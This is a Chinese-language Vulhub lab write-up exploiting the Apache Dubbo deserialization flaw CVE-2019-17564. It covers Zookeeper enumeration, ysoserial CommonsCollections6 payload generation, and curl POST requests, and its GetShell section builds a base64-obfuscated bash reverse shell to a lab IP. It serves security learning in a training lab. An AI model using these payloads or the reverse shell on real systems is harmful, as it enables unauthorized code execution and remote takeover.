Vulhub 漏洞学习之：Dubbo

Vulhub 漏洞学习之：Dubbo

目录

• Vulhub 漏洞学习之：Dubbo
• 1 Aapche Dubbo Java反序列化漏洞（CVE-2019-17564）
  • 1.1 环境安装
  • 1.2 漏洞利用过程
• 1.3 GetShell

1 Aapche Dubbo Java反序列化漏洞（CVE-2019-17564）

Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信，当使用http协议时，Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用，而这个过程会读取POST请求的Body并进行反序列化，最终导致漏洞。

在Spring文档中，对HttpInvokerServiceExporter有如下描述，并不建议使用：

WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead.

这个漏洞影响Apache Dubbo 2.7.4及以前版本，2.7.5后Dubbo使用com.googlecode.jsonrpc4j.JsonRpcServer替换了HttpInvokerServiceExporter。

参考链接：

• https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.html
• https://www.anquanke.com/post/id/198747
• https://paper.seebug.org/1128/

1.1 环境安装

服务启动后，访问http://your-ip:8080，服务器默认会返回500错误。

1.2 漏洞利用过程

1. 利用该漏洞需要先知道目标RPC接口名，而Dubbo所有的RPC配置储存在registry中，通常使用Zookeeper作为registry。如果能刚好找到目标的Zookeeper未授权访问漏洞，那么就可以在其中找到接口的名称与地址。

2. Vulhub对外开放了8080端口和2181端口，其中2181即为Zookeeper的端口，我们本地下载Zookeeper，使用其中自带的zkCli即可连接到这台Zookeeper服务器：

   ./zkCli -server target-ip:2181
   ./zkCli.sh -server 192.168.210.13:2181
   

   

3. 连接后进入一个交互式控制台，使用ls /即可列出其中所有节点，包括Dubbo相关的配置：获取到RPC接口名为org.vulhub.api.CalcService。

   

4. 直接用ysoserial生成CommonsCollections6的Payload

   java.exe -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections6  "touch /tmp/success" > 1.poc
   

5. 将生成的Payload作为POST Body发送到http://your-ip:8080/org.vulhub.api.CalcService即可触发反序列化漏洞：

   curl -XPOST --data-binary @1.poc http://your-ip:8080/org.vulhub.api.CalcService
   # 或
   POST /org.vulhub.api.CalcService HTTP/1.1
   Host: 192.168.210.13:8080
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Connection: close
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 1358
   
   payload
   

   

   

6. 成功创建

   

1.3 GetShell

1. 生成反弹shell的Payload

   java.exe -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar CommonsCollections6  "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjEwLjEwLzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" > 1.poc
   

2. 利用Payload

   curl -XPOST --data-binary @1.poc http://192.168.210.13:8080/org.vulhub.api.CalcService
   

   

3. 成功反弹shell